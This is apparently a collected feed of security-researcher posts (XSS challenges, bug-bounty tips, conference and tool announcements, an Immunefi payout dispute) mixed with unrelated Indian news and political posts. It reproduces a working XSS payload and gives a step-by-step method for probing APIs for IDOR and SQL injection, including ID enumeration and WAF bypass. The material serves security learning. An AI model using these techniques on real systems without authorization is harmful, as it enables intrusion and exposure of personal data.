0xViem

@hash_kitten @kevin_mizu This took a while but finally got it

Posting a mini XSS challenge! Goal is to pop an alert. I believe this trick is not well known. Intended solution is chrome only. Thanks to @kevin_mizu for beta testing! Don't post solutions in the thread; DM only! xss.hashkitten.io/xss1.html

You may have noticed I've been a bit quiet on social media recently, this is why...I'm going to present at @BlackHatEvents #BHUSA

@_jensec Wtf did I just saw 💀💀

how to hack discord, vercel and more with one easy trick kibty.town/blog/mintlify/

Anchor/area tags can leak page URLs (origin, path, query, post-click fragment) by using href="#" with the ping attribute pointing elsewhere. Works in Chrome and Safari (Firefox disables ping by default). storage.googleapis.com/nowaskyjr/ping…

A POC for CVE-2025-55182 gist.github.com/maple3142/48bc…

अभी हाल ही में Operation Sindoor हुआ। हमारी सेनाओं ने पाकिस्तान based terrorist camps को तबाह किया। हालाँकि हमने बेहद संतुलित उत्तर दिया था, हमारा जवाब escalatory नहीं था, लेकिन पाकिस्तान के रवैये ने Operation Sindoor के बाद border पर situation को normal नहीं रहने दिया। इस दौरान जिस तरह से देश भर में mock drills हुए और हमारे प्रशासनिक अधिकारियों ने उस mock drill को successfully जनता तक समझाते हुए पहुँचाया, वह आप सबके लोक सेवक होने का एक brilliant example है। आप सबको भी, भविष्य में होने वाली ऐसी किसी भी स्थिति के लिए अपने आप को मानसिक रूप से तैयार रखना है: रक्षा मंत्री श्री @rajnathsingh

I'm really excited to share my first research article related to hacking Google Gemini! buganizer.cc/hacking-gemini… #bugSWAT #GoogleVRP

With only 48 hours remaining in a bug bounty event, I used @HacktronAI CLI to perform large-scale analysis of several JDBC drivers. Netting $85,000 in total rewards. This write-up shows how AI-assisted vulnerability research is speeding up the work of researchers and leading to high-impact findings. Read here - hacktron.ai/blog/jdbc-audi…

Let's do interactive #bugbounty learning. Path-based IDORs. Fun! You visit a webpage with your browser, which should be Firefox, at https://www[.]place[.]com/user/12345. The webpage forces a client request to https://api[.]place[.]com/api/v3/users/12345 This request responds with JSON about that user, to populate into your Firefox web browser. Its sensitive PII. Let me break down my thought process here. 1] The first thing I do with this in less than 5 seconds, is try the number 12344 in the path. Iterate a bit, make sure you get 401/403s back. If not, you probably are looking at someone else's PII. Yay, GG. 2] I try to change the path to /v1/, /v2/, /v4/. Remove it entirely too. Sometimes different API versions are less secure. Those still in development, older ones, etc. 3] Then I run parameters at the end like ../api/v3/users/12345?userId=12344. I try every parameter from the JSON response(s). Did the response change? If it changed the parameter did something. Investigate. (Intruder here) 4] I search JS files for "/api/v3/users" or keywords in the path to find where and how the API path was built, or where there may be other API paths. This is usually in the JS. Sometimes there are deprecated, hidden, or admin APIs laying there. Then I try all of those. Pivot pivot pivot. 5] I usually try appending ?, /, #, and/or URL encoded versions of each of these to the end of the API path. Sometimes that results in a bypass. One time I bypassed the security on thousands of APIs using a trailing slash due to ... well... bad code. This trick also works good when the mitigation was a WAF block. 6] Traverse backwards down the API. Check /api/v3/users/, /api/v3/, /api/, -- fuzz for obvious swagger or API schema paths. Add extra slashes, it looks cool. ///api//v3//users///// . Who knows right? 7] Throw a single quote in there, /12345'. Did it blow up? Add another quote in there, /12345'' - did it un-blow up? Might be SQLi. Don't try XSS, XSS is stupid. 8] Fuzz the words "users". What else could be there? 9] Sometimes APIs reserve keywords, like "ALL". Try things like /users/all instead of /users/12345. Run the US Websters Dictionary through that path. Watch case sensitivity, if it uses lower, its probably always lower. So dont send uppercase stuff to a lowercase API. 10] If none of this worked, I'm probably on another API at this point. Less than 10 minutes gone. What else would you do?

People born post-2000 have a lot of questions about what happened in Delhi. Most of them were not even in their teens in 2014, and do not know about these traumatic years. Never forget.

హైదరాబాద్‌లో అరెస్టైన ఉగ్రవాది డాక్టర్‌ మొయినుద్దీన్‌ నుంచి కీలక సమాచారం.. రాజేంద్రనగర్‌లో మొయినుద్దీన్‌ను అరెస్టు చేసిన గుజరాత్ ఏటీఎస్‌.. భారీ మొత్తంలో విష ప్రయోగం చేసి చంపాలని కుట్ర.. రెసిన్‌ విషాన్ని తయారు చేస్తున్న సయ్యద్ మొయినుద్దీన్.. దేవాలయాలు, వాటర్‌ ట్యాంక్‌లో రెసిన్‌ కలిపి సామూహిక విష ప్రయోగం చేయాలని కుట్ర.. ఇప్పటికే సయ్యద్‌తో పాటు నలుగురిని అరెస్ట్ చేసిన గుజరాత్ ఏటీఎస్ #Hyderabad #Gujarat #GujaratPolice

Let us grieve, let us mourn, let us indulge a moment's weakness. There will be time aplenty for retribution at the crack of dawn.

@Behi_Sec @garethheyes Or you can retweet the actual tweet? But gotta farm followers ryt? So many losers to block these days x.com/garethheyes/st…

This XSS payload by @garethheyes is brilliant: <svg onload​="attributes[0].value=id+URL+id,new onload" id=`> It requires this hash: #${alert(1)}

I am proud to share the announcement about our CodeMender project at @GoogleDeepMind, an agent that can automatically fix a range of code security vulnerabilities. From only a modest-compute run, our agent submitted 72 high-quality fixes to vulnerable code in popular codebases, and maintainers accepted and upstreamed them. deepmind.google/discover/blog/…

The whitepaper is live! Learn how to win the HTTP desync endgame... and why HTTP/1.1 needs to die: http1mustdie.com

@ITSecurityguard The OG 🤣

We all know who the real #1 US Hacker on HackerOne is 👇

@immunefi 🗿

Statement: A. Spectra Finance contracted with Immunefi to run an Audit Competition. Per our process, Immunefi provided Spectra the program draft that included the reward structure and linked to our standard competition reward terms. The Spectra team, including their CEO, conducted multiple reviews over 3+ weeks and approved the program draft that clearly stated that a single bug finding unlocks the full $40K pool. Not a single time during program drafting, marketing or during the 1.5 month hunting and evaluation period did they bring up an issue with this reward mechanic. Only when it was time to pay the community did they claim there was a disconnect in expectations. B. The program received 331 reports from 103 SRs of which 27 were confirmed reports excluding insight reports. C. After several weeks of good faith engagement to resolve the matter with Spectra including offering to contribute Immunefi program fees to bridge the gap and cover the full $40k payout, the matter remains unresolved. Spectra has not honored its commitment per the program rules they approved for publishing on Immunefi. D. We have designed our platform rules to protect the balance of interests and hold them at the highest tier of priority to protect against bad faith actions from either party. E. In this case, given the >1 month delay in payment to SRs, we have decided to make SRs whole using Immunefi’s own funds, rather than accept the unreasonably low and unfair offer made by Spectra. Their offer to pay per bug finding is precisely what a Bug Bounty program is - NOT an audit competition. F. It would have been easier for us to either shortchange SRs or quietly fill the gap in payments from Spectra but we instead chose transparency and solving the problem for SRs. Given the recent undercurrent of opacity on such issues in the web3 sec space, we decided to take the lead in defining the way forward - even if it means taking a financial hit for it. G. We would like to highlight here that this is the first case of such abuse by a project in our history of running 43 competition programs. H. To protect SRs and the platform from such abuse in the future, we will be updating our policy on pre-payment of the reward in due course.